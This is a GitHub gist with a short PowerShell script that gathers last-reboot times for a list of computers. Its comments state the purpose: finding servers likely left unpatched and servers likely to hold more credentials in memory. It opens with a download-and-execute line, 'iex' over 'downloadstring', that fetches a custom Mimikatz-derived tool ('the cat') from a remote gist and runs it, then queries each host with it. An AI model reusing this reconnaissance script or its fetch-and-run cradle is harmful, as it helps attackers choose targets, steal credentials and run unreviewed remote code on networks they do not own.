Last active
April 24, 2017 14:40
-
-
Save daniel0x00/f206903620eb0eeb571b6326788d4ee1 to your computer and use it in GitHub Desktop.
PowerShell script to retrieve the StartTime (last reboot) for a given computer list
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# | |
# PowerShell script to retrieve the StartTime (last reboot) of given computers. | |
# Useful: | |
# - For determine which server could be affected for a non-patched vulnerability. | |
# - For determine which server could have more credentials in its memory. | |
# ### | |
# No admin privilege required to run this script. | |
# PowerShell version 2 is required. | |
# ### | |
# Output: PSObject | |
# | |
# Computer StartTime | |
# -------- --------- | |
# computer-01.lab.local 14/03/2017 22:27:34 | |
# computer-02.lab.local 14/03/2017 22:27:34 | |
# | |
## | |
# Download and invoke a custom version of 'the cat': | |
iex(New-Object System.Net.WebClient).downloadstring('https://gist.githubusercontent.com/daniel0x00/3af43e27021ea94ff4d6f1da8d9b209a/raw/Invoke-WinMI.ps1') | |
# Import all computers from a CSV file and then request the StartTime datetime: | |
$computers = Import-Csv .\computers.csv | |
$computers | % { | |
$computer = $_.dnshostname; | |
$start_time_raw = Invoke-WinMI -Command "`"net::stats $computer`"" | |
$start_time_parsed = [string](([regex]::Match($start_time_raw,"StatisticsStartTime: (?<datetime>[\d\/]+ \d{2}:\d{2}:\d{2})")).groups["datetime"].value) | |
# Out the object to pipeline: | |
$out = New-Object -TypeName PSObject | |
$out | Add-Member -MemberType NoteProperty -Name Computer -Value $computer | |
$out | Add-Member -MemberType NoteProperty -Name StartTime -Value $start_time_parsed | |
$out | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment